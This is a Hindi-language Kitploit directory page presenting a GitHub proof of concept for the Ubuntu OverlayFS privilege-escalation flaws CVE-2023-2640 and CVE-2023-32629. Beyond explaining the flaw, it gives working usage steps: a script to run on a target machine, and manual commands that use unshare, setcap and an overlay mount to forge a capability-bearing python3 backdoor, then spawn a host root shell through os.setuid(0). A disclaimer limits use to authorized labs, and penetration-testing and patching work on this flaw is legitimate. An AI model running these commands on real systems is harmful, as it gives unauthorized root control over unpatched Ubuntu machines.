Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-2640-CVE-2023-32629-Interactive-PoC — उबंटू OverlayFS (GameOver(lay)) के लिए एक साफ, इंटरैक्टिव मल्टी-स्टेप लोकल प्रिविलेज एस्केलेशन (LPE) शोषण जो उपयोगकर्ता नेमस्पेस सैंडबॉक्स से बाहर निकलकर एक वास्तविक होस्ट रूट शेल प्राप्त करता है। | Kitploit
उपकरण/GitHubGitHub/amar-imamovic/cve-2023-2640-cve-2023-32629-interactive-poc
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubamar-imamovic/cve-2023-2640-cve-2023-32629-interactive-poc

CVE-2023-2640-CVE-2023-32629-Interactive-PoC

उबंटू OverlayFS (GameOver(lay)) के लिए एक साफ, इंटरैक्टिव मल्टी-स्टेप लोकल प्रिविलेज एस्केलेशन (LPE) शोषण जो उपयोगकर्ता नेमस्पेस सैंडबॉक्स से बाहर निकलकर एक वास्तविक होस्ट रूट शेल प्राप्त करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
2 महीने पहलेअभी तक समीक्षित नहीं

CVE-2023-2640 & CVE-2023-32629 (GameOverLay) - वास्तविक होस्ट रूट एस्केप PoC

एक इंटरैक्टिव, बहु-चरणीय लोकल प्रिविलेज एस्केलेशन (LPE) प्रूफ ऑफ कॉन्सेप्ट (PoC) जो Ubuntu Linux कर्नेल OverlayFS कमजोरियों (CVE-2023-2640 / CVE-2023-32629) को लक्षित करता है।

मानक स्वचालित एक-लाइनर्स के विपरीत जो आपके इंटरैक्टिव शेल को एक प्रतिबंधात्मक यूज़र नेमस्पेस (फेक रूट) में फँसा देते हैं, यह विधि एक्सप्लॉइट अनुक्रम को विभाजित करती है ताकि सुरक्षित रूप से एक वास्तविक, अप्रतिबंधित होस्ट रूट शेल प्राप्त किया जा सके।


"फेक रूट" समस्या की व्याख्या

कई सार्वजनिक एक्सप्लॉइट्स सेटअप और निष्पादन को एक साथ एक एकल स्वचालित शेल अनुक्रम का उपयोग करके जोड़ते हैं, जैसे: unshare -rm sh -c "mkdir l u w m && ... && touch m/*; python3 -c '...'"

क्योंकि Python निष्पादन पेलोड unshare के डबल कोट्स के अंदर एम्बेडेड है, यह यूज़र नेमस्पेस सैंडबॉक्स के अंदर निष्पादित होता है।

  • परिणाम: आपकी यूज़र ID uid=0(root) के रूप में दिखती है, लेकिन आपका शेल होस्ट से क्रिप्टोग्राफिक रूप से अलग होता है। यदि आप होस्ट रूट निर्देशिका (cd /root) देखने का प्रयास करते हैं, तो आपको Permission Denied त्रुटि मिलेगी।

समाधान

यह PoC प्रक्रिया को दो अलग-अलग तार्किक चरणों में विभाजित करता है:

  1. सैंडबॉक्स के अंदर हथियार बनाना: OverlayFS ovl_copy_up दोष का शोषण करने के लिए पर्याप्त समय तक फेक रूट अनुमतियाँ प्राप्त करने के लिए unshare चलाएँ, जिससे एक उच्च-विशेषाधिकार setcap cap_setuid+eip क्षमता एक स्थानीय Python बाइनरी फ़ोल्डर में लीक हो जाए।
  2. सैंडबॉक्स के बाहर निष्पादित करना: नेमस्पेस स्वचालित रूप से बंद हो जाता है। फिर बैकडोर बाइनरी को एक सामान्य अविशेषाधिकार प्राप्त उपयोगकर्ता के रूप में वास्तविक होस्ट संदर्भ से सीधे निष्पादित किया जाता है। कर्नेल लीक हुए फ्लैग को पढ़ता है, os.setuid(0) की अनुमति देता है, और आपको वास्तविक होस्ट-स्तरीय सिस्टम प्रशासन विशेषाधिकार प्रदान करता है।

कमजोरी विवरण

  • CVE-2023-2640: Ubuntu कर्नेल OverlayFS में यूज़र नेमस्पेस के भीतर फ़ाइल क्षमताओं का गलत प्रतिबंध।
  • CVE-2023-32629: Ubuntu कर्नेल के ovl_copy_up_meta_inode_data फ़ंक्शन में दोष जो फ़ाइल माइग्रेशन के दौरान सत्यापन जाँच को पूरी तरह से बायपास करने की अनुमति देता है।
  • प्रभावित सिस्टम: Ubuntu 22.04 LTS जो 6.2.0-26-generic से नीचे के Linux कर्नेल रिलीज़ चला रहे हैं।

उपयोग निर्देश

विधि 1: स्वचालित स्क्रिप्ट (अनुशंसित)

  1. लक्ष्य मशीन पर exploit.sh को क्लोन या डाउनलोड करें (उदाहरण के लिए, /tmp के अंदर)।
  2. इसके निष्पादन अनुमतियाँ दें और इसे चलाएँ:
root@kitploit:~
chmod +x exploit.sh
./exploit.sh

विधि 2: मैन्युअल लाइन-दर-लाइन इंटरैक्टिव निष्पादन

यदि आप एक अस्थिर रिवर्स शेल पर काम कर रहे हैं, तो इन कमांड को पूरी तरह से अलग-अलग चलाएँ, प्रत्येक पंक्ति के बाद Enter दबाते हुए:

root@kitploit:~
# 1. Clean workspace environment 
cd /tmp && rm -rf l u w m

# 2. Forge the backdoor within the temporary namespace sandbox
unshare -rm sh -c "mkdir l u w m && cp /usr/bin/python3 l/ && setcap cap_setuid+eip l/python3 && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*"

# 3. Trigger execution on the real host to claim true root
./u/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

अपने वास्तविक विशेषाधिकारों को सत्यापित करने के लिए अपनी वर्तमान उपयोगकर्ता प्रोफ़ाइल जाँचें:

root@kitploit:~
whoami
cat /root/root.txt

श्रेय और आभार

इस इंटरैक्टिव रिफैक्टर में उपयोग किए गए आधारभूत एक्सप्लॉइट मैकेनिक्स की खोज और दस्तावेज़ीकरण मूल रूप से सुरक्षा शोधकर्ताओं Liav Eliyahu और g1vi द्वारा किया गया था।

अस्वीकरण

यह रिपॉजिटरी केवल शैक्षिक, सुरक्षा अनुसंधान और अधिकृत पेनिट्रेशन टेस्टिंग उद्देश्यों (जैसे HackTheBox / OffSec लैब्स) के लिए बनाई गई है। लेखक इस सामग्री के दुरुपयोग, अनधिकृत पहुँच प्रयासों, या बुनियादी ढाँचे को हुए नुकसान के लिए कोई दायित्व नहीं मानता है। जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें